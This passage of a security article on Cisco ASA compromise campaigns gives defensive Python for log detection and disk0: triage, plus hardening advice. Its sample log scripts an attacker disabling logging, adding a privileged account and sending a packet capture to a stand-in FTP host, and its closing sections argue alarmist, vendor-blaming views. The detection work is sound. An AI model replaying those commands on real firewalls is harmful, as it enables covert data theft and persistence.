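    (re.compile(r"^copy .*\b(ftp|scp|tftp|https?|smb):"), "file copied off-box"),
]


def _parse_ts(line: str) -> datetime:
    m = _TS.match(line)
    return datetime.strptime(m.group(1), "%b %d %Y %H:%M:%S") if m else datetime.min


def detect(lines):
    """Return 'SEVERITY description' strings for the given syslog lines."""
    findings = []
    failures = defaultdict(list)          # source IP -> [(timestamp, username)]
    for line in lines:
        if m := _FAIL.search(line):
            failures[m.group(2)].append((_parse_ts(line), m.group(1)))
        elif m := _CMD.search(line):
            user, cmd = m.groups()
            for pat, desc in SENSITIVE_CMDS:
                if pat.search(cmd):
                    findings.append(f"HIGH {desc}: user '{user}' ran '{cmd}'")
        elif m := _LOGIN.search(line):
            src, target, user = m.groups()
            if ip_address(src) not in MGMT_NET:
                findings.append(f"HIGH admin login to {target} as '{user}' from non-management address {src}")
    # Brute force: BRUTE_THRESHOLD failures from one source inside BRUTE_WINDOW.
    # Several distinct usernames in that window points to password spraying.
    for src, events in failures.items():
        events.sort()
        for i in range(len(events) - BRUTE_THRESHOLD + 1):
            window = events[i:i + BRUTE_THRESHOLD]
            if window[-1][0] - window[0][0] <= BRUTE_WINDOW:
                users = {u for _, u in window}
                kind = "password spray" if len(users) > 1 else "brute force"
                findings.append(f"MEDIUM VPN {kind} from {src}: {len(events)} failures, {len(users)} distinct users")
                break
    return findings


# Constructed sample log; nothing here comes from a real device.
SAMPLE_LOG = """\
Oct 15 2025 14:02:01 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = jdoe : user IP = 203.0.113.7
Oct 15 2025 14:02:03 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = asmith : user IP = 203.0.113.7
Oct 15 2025 14:02:05 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = admin : user IP = 203.0.113.7
Oct 15 2025 14:02:06 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = it : user IP = 203.0.113.7
Oct 15 2025 14:02:08 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = svc_backup : user IP = 203.0.113.7
Oct 15 2025 14:30:00 fw-edge-1 : %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.10.0.5 : user = bwayne : user IP = 198.51.100.22
Oct 15 2025 15:10:44 fw-edge-1 : %ASA-6-605005: Login permitted from 203.0.113.9/51122 to outside:198.51.100.1/ssh for user "admin"
Oct 15 2025 15:11:02 fw-edge-1 : %ASA-5-111008: User 'admin' executed the 'no logging enable' command.
Oct 15 2025 15:11:30 fw-edge-1 : %ASA-5-111008: User 'admin' executed the 'capture cap1 interface inside' command.
Oct 15 2025 15:12:15 fw-edge-1 : %ASA-5-111008: User 'admin' executed the 'username svc_mon password S3cret! privilege 15' command.
Oct 15 2025 15:13:40 fw-edge-1 : %ASA-5-111008: User 'admin' executed the 'copy /noconfirm /pcap capture:cap1 ftp://203.0.113.9/cap1.pcap' command.
Oct 15 2025 16:00:00 fw-edge-1 : %ASA-6-605005: Login permitted from 10.10.0.40/50100 to inside:10.10.0.1/ssh for user "netops"
Oct 15 2025 16:00:20 fw-edge-1 : %ASA-5-111008: User 'netops' executed the 'show running-config' command.
"""

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(finding)
```

The single failed login from 198.51.100.22 and the netops session from inside the management range produce nothing, which is the point of thresholds and an allowlist: the alert budget goes to the sequence that matters. Because ArcaneDoor’s first move was to switch syslog off, the “logging disabled” hit should also be backed by a heartbeat alarm that fires when a device simply stops sending.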

8. Incident Response Preparation

  • Assume your Cisco devices may already be compromised
  • Run Cisco integrity verification tools:
    • Cisco Trust Anchor verification
    • ROMMON integrity checks
    • File system audits
  • Engage a forensics team if suspicious activity is found
  • Prepare for potential device rebuild/replacement
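
For the file system audit, the quickest win on an ASA is a dir disk0: listing: Line Runner’s persistence relied on an archive on disk0: that the legacy VPN client pre-loading feature unpacked at boot, and any ZIP or script file on a firewall’s flash deserves an explanation. The Python below is an example added for this article, not Cisco’s forensic procedure. It parses a constructed dir disk0: listing (filenames, sizes and dates invented) and flags archives, scripts, files written after the last recorded maintenance window, and files missing from a known-good inventory. LAST_MAINTENANCE and KNOWN_GOOD stand in for your own change records.

```python
"""Triage a 'dir disk0:' listing from a Cisco ASA for files that warrant
forensic follow-up: ZIP archives (the on-disk component of Line Runner
persistence), script files, anything written after the last maintenance
window, and anything absent from a known-good inventory.

Added example for this article, not Cisco code. SAMPLE_DIR is constructed
(filenames, sizes and dates are invented); LAST_MAINTENANCE and KNOWN_GOOD
stand in for real change records. Hits are leads to check against Cisco's
published ArcaneDoor guidance, not proof of compromise.
"""
import re
from datetime import datetime

# index  perms  size  HH:MM:SS  Mon DD YYYY  name
_ENTRY = re.compile(
    r"^\s*\d+\s+(\S+)\s+(\d+)\s+(\d{2}:\d{2}:\d{2})\s+(\w{3} \d{2} \d{4})\s+(\S.*)$")
SCRIPT_EXT = (".lua", ".sh", ".py", ".pl", ".tcl")


def parse_dir(listing: str) -> list[dict]:
    """Parse 'dir disk0:' output into dicts with name, perms, size, mtime."""
    entries = []
    for line in listing.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue                      # header, totals line, blank
        perms, size, t, d, name = m.groups()
        entries.append({
            "name": name.strip(),
            "perms": perms,
            "size": int(size),
            "mtime": datetime.strptime(f"{d} {t}", "%b %d %Y %H:%M:%S"),
        })
    return entries


def triage_disk0(listing: str, last_maintenance: datetime, known_good: set[str]):
    """Return [(filename, [reasons])] for entries that need a second look."""
    findings = []
    for e in parse_dir(listing):
        lower = e["name"].lower()
        reasons = []
        if lower.endswith(".zip"):
            reasons.append("ZIP archive on disk0: (Line Runner persisted via an archive here)")
        if lower.endswith(SCRIPT_EXT):
            reasons.append("script file on a firewall filesystem")
        if e["mtime"] > last_maintenance:
            reasons.append(f"written {e['mtime']:%Y-%m-%d %H:%M} after the last maintenance window")
        if e["name"] not in known_good:
            reasons.append("not in the known-good inventory for this device")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


# Constructed listing: every name, size and date below is invented.
SAMPLE_DIR = """\
Directory of disk0:/

8      -rwx  73629840   09:42:10 Mar 04 2025  asa9-16-4-85-smp-k8.bin
9      -rwx  43278210   09:45:31 Mar 04 2025  asdm-7191.bin
10     -rwx  5934       09:50:02 Mar 04 2025  anyconnect-profile.xml
11     drwx  4096       11:20:44 Mar 04 2025  coredumpinfo
12     -rwx  38216      02:17:55 Sep 19 2025  update_bundle.zip
13     -rwx  1288       02:18:03 Sep 19 2025  init.lua

8238104576 bytes total (7991418880 bytes free)
"""
LAST_MAINTENANCE = datetime(2025, 3, 5)          # assumed: last approved change
KNOWN_GOOD = {"asa9-16-4-85-smp-k8.bin", "asdm-7191.bin",
              "anyconnect-profile.xml", "coredumpinfo"}

if __name__ == "__main__":
    for name, reasons in triage_disk0(SAMPLE_DIR, LAST_MAINTENANCE, KNOWN_GOOD):
        print(name)
        for r in reasons:
            print("   -", r)
```

Pair this with verify /sha-512 disk0:/<image> against the hash on Cisco’s download page and with the core dump collection ED 25-03 required, and remember that a clean listing is not a clean device: Line Dancer lived only in memory and left nothing on disk0: to find.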

Long-Term Strategy

9. Architecture Redesign

  • Implement Zero Trust Network Access (ZTNA)
  • Eliminate reliance on perimeter-based VPN
  • Deploy Software-Defined Perimeter (SDP)
  • Segment networks to limit lateral movement
  • Consider moving to cloud-delivered security services

10. Vendor Diversification

  • Evaluate dependency on single vendor (Cisco)
  • Consider multi-vendor strategy for critical infrastructure
  • Balance: Vendor expertise vs. monoculture risk
  • Reality check: if one ransomware group can weaponize your entire perimeter because it all comes from one vendor, is that dependence prudent?

11. Threat Intelligence Integration

Subscribe to and act on:

  • Cisco PSIRT advisories
  • CISA KEV catalog updates
  • Threat intelligence on Akira and other groups
  • GreyNoise scanning activity reports
  • Monitor for Cisco exploitation campaigns

12. Staffing and Training

  • Hire or contract Cisco security specialists
  • Train existing staff on:
    • Cisco hardening best practices
    • Incident response for network device compromise
    • ArcaneDoor/Akira TTPs
  • Tabletop exercises for Cisco device compromise scenarios

13. Board-Level Accountability

Present to executive leadership and board:

  • Current Cisco device inventory and patch status
  • Exposure to Akira ransomware exploitation
  • Federal government’s patching failures (demonstrate even feds struggle)
  • Financial impact: $244M in Akira proceeds; a 158-year-old, 730-employee company destroyed (KNP)
  • Request adequate budget for remediation, staff, tools

The Uncomfortable Questions

1. When a networking vendor has products specifically targeted by a $244 million ransomware operation, at what point does continuing to deploy their equipment become negligent?

2. If the Congressional Budget Office—with direct access to CISA expertise—can’t keep Cisco firewalls patched, how can we expect small businesses to do so?

3. When Chinese nation-state actors develop malware (Line Runner) that survives firmware upgrades and reboots on Cisco devices, what is the actual remediation strategy?

4. If 60% of cyber incidents in 2024 involved identity-based attacks, and perimeter VPN appliances such as Cisco’s are a leading vector, why are we still deploying perimeter-based VPN architectures?

5. When attackers can deploy a “disco” password and gain universal access to Cisco switches via SNMP, why do we trust SNMP to be enabled at all?

6. If Akira specifically provides victims with security checklists after attacks, doesn’t that demonstrate they know their playbook (exploit Cisco) will continue working indefinitely?

7. When federal agencies marked devices as “patched” but were actually running vulnerable software, what does that say about the entire patch management industry?

8. If Operation Zero Disco attackers are mocking Cisco by using “disco” as a password, doesn’t that suggest deep familiarity with and contempt for Cisco’s security practices?

These aren’t rhetorical. They’re the questions auditors, regulators, and plaintiff attorneys will ask after your breach.

Lessons from the Firewall Triad: Cisco, Fortinet, SonicWall

We’ve now analyzed three major firewall vendors experiencing active exploitation:

SonicWall: 14 CVEs on CISA KEV, Akira exploitation, Marquis breach (788,000 victims)

Fortinet: 20 CVEs on CISA KEV, Qilin/Mora_001 exploitation, healthcare devastation

Cisco: Multiple CVEs on CISA KEV, Akira’s $244M campaign, ArcaneDoor nation-state malware

The Common Threads:

All three are being actively exploited by ransomware groups

  • SonicWall → Akira, Fog
  • Fortinet → Qilin, Mora_001/SuperBlack
  • Cisco → Akira (primary), various others

All three have post-patch persistence problems

  • SonicWall → Stolen credentials, OTP seeds
  • Fortinet → Symlink-based persistence (14,000+ devices)
  • Cisco → Line Runner survives upgrades, “disco” rootkits

All three are targets of Chinese nation-state actors

  • Multiple APT groups targeting all three vendors
  • Focus on long-term espionage vs. ransomware monetization
  • Sophisticated zero-day development

All three demonstrate massive patching failures

  • Organizations running years-old vulnerable firmware
  • Even federal agencies fail to patch properly
  • Patch management complexity exceeds organizational capabilities

All three have created vendor monocultures

  • Organizations deploy single vendor across entire infrastructure
  • Compromise of perimeter device = compromise of everything
  • Vendor-specific expertise required, limiting hiring pool

The Difference:

Cisco is worse because of its ubiquity. When Akira says “we exploit VPN services,” the device is most often Cisco, with SonicWall the other. When the Congressional Budget Office gets breached, it’s Cisco. When a 158-year-old company is destroyed by a weak password, it’s a Cisco VPN.

Cisco isn’t just another firewall vendor experiencing exploitation—Cisco is the primary attack surface of the modern internet.

Conclusion: America’s Critical Infrastructure Runs on Compromised Cisco Equipment

The evidence is overwhelming:

  • $244 million in Akira ransoms, with Cisco VPN appliances a recurring initial access vector
  • 48,000 unpatched Cisco devices remain internet-facing
  • Federal agencies themselves cannot keep Cisco equipment secure
  • Nation-state actors have persistent access via Line Runner and other implants
  • 60% of incidents involve identity attacks, with VPN appliances, very often Cisco, a leading vector
  • KNP Logistics destroyed after 158 years due to Cisco VPN compromise
  • Congressional Budget Office breached via unpatched Cisco firewall

The uncomfortable reality: Cisco’s market dominance has created a single point of failure for critical infrastructure globally, and sophisticated threat actors have figured out how to exploit it at scale.

For organizations still running Cisco equipment (which is nearly everyone), the path forward is clear:

  • Assume your Cisco devices are compromised and conduct thorough forensic analysis
  • Patch immediately or isolate from internet if patching is impossible
  • Implement defense-in-depth because Cisco perimeter alone cannot protect you
  • Move to Zero Trust architecture eliminating reliance on VPN
  • Consider vendor diversification to reduce monoculture risk

For CISOs and boards, the KNP Logistics example should be seared into your memory: A 158-year-old company, 730 jobs, destroyed in weeks because of a weak password on a Cisco VPN.

The next victim won’t be asking “how did this happen?” They’ll be asking “why didn’t we act when we knew Cisco was being actively exploited by Akira?”

Don’t let your organization become another case study in preventable disaster.


Identity-Based Attack Trends:

  • Cisco Talos 2024 Year in Review - 60% of incidents involved identity attacks
  • CISA KEV Catalog - Current list of Cisco exploited vulnerabilities


Analysis conducted December 2025. Based on CISA advisories, Cisco PSIRT bulletins, threat intelligence reports, and documented breach case studies. Organizations should consult with security professionals and legal counsel regarding remediation strategies.